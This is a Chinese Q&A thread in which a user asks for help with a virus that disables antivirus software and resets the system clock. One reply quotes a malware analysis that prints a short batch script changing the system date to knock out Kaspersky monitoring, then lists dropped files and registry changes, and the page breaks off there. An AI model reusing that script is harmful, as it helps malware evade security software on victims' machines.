中了病毒~~~!!!请高手指点
来源:百度知道 编辑:UC知道 时间:2024/05/30 02:39:47
XP系统,正版瑞星,昨天好象中了什么病毒,特征如下:桌面出现一个delme文件,瑞星监控被禁止,控制面版-添加或删除程序想要修复瑞星,发现修复项被灰掉,系统时间被改为2000年,月份和时间没变,修改时间后还会被篡改回到2000年,桌面的delme文件删除掉后一段时间还会再出现,急!!!!!高手指点~~!!!
我看了一下进程,有一个进程叫cmd.exe占用了60-70%的内存,结束进程后CPU占用明显下降.恢复正常,但是开机后次进程依然出现,另外在我的C盘(系统盘)下Documents and Settings--用户名文件夹下有一个delme批处理文件.大侠门速度帮忙,高分等你,拿出点真正有效的东西!!!
我看了一下进程,有一个进程叫cmd.exe占用了60-70%的内存,结束进程后CPU占用明显下降.恢复正常,但是开机后次进程依然出现,另外在我的C盘(系统盘)下Documents and Settings--用户名文件夹下有一个delme批处理文件.大侠门速度帮忙,高分等你,拿出点真正有效的东西!!!
我家也这样,方法如下:先断开网络连接,卸载杀毒软件及防火墙,重新安装,然后皆可以正常使用。如果你没有瑞星正版的光盘,可以到官网下载中心下载:www.rising.com.cn
一个对付卡巴的病毒
样本动作
判断用户机子是否装卡巴(KIS/KAV)
如果安装
释放
GoKaba.bat
文件内容
CODE:
@echo off
set date=%date%
date 1987-10-18
ping -n 45 localhost > nul
date %date%
del %0
[Copy to clipboard]
=>将系统时间调整为1987-10-18
卡巴的监控立刻失效
成功完成K.O.卡巴后
---------------------------------------------------------------------------------------------
以下为所有机子状况
释放文件
%SystemRoot%\system32\*.EXE
%SystemRoot%\system32\*T.EXE
%SystemRoot%\system32\*.DLL
%SystemRoot%\system32\delme.bat
* =随机8位字母(如7F9DE518\312E0FDA)
注册表变化
添加伪系统服务
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\* "DisplayN